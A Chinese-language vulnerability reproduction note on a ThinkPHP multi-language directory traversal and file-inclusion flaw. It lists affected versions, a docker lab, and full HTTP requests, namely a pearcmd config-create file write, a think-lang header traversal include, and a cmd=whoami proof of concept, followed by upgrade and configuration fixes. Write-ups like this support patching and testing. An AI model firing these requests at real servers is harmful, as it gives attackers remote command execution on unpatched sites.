简介
Thinkphp 是一款 PHP 框架,如果开启了多语言功能,就可以通过 get、header、cookie 等位置传入参数实现目录穿越和文件包含,从而利用 pearcmd 文件包含实现远程命令执行(RCE)。
1、需要Thinkphp开启多语言功能
2、需要有pearcmd扩展
影响版本
v6.0.1 < Thinkphp < v6.0.13
Thinkphp v5.0.x
Thinkphp v5.1.x
复现
环境
docker run -it -d -p 8080:80 vulfocus/thinkphp:6.0.12 访问8080
文件包含
生成文件
GET /public/index.php?+config-create+/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1 Host: 222.x.x.x:8080 accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 DNT: 1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Content-Length: 0 think-lang:../../../../../../../../usr/local/lib/php/pearcmd Cookie: think_lang=zh-cn; Connection: close
包含文件
GET /public/index.php HTTP/1.1 Host: 222.x.x.x:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 DNT: 1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 think-lang:../../../../../../../../tmp/hello Cookie: think_lang=zh-cn; Connection: close
目录穿越
/index.php?s=index/index/index/think_lang/…/…/extend/pearcmd/pearcmd/index&cmd=whoami
POC
GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=whoami HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
修复
1、若无必要,可关闭多语言功能,可参考文档
https://www.kancloud.cn/manual/thinkphp6_0/1037637
https://static.kancloud.cn/manual/thinkphp5/118132
2、官方已发布6.0.14、5.1.42,建议升级至安全版本。
声明:本站所有资源,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
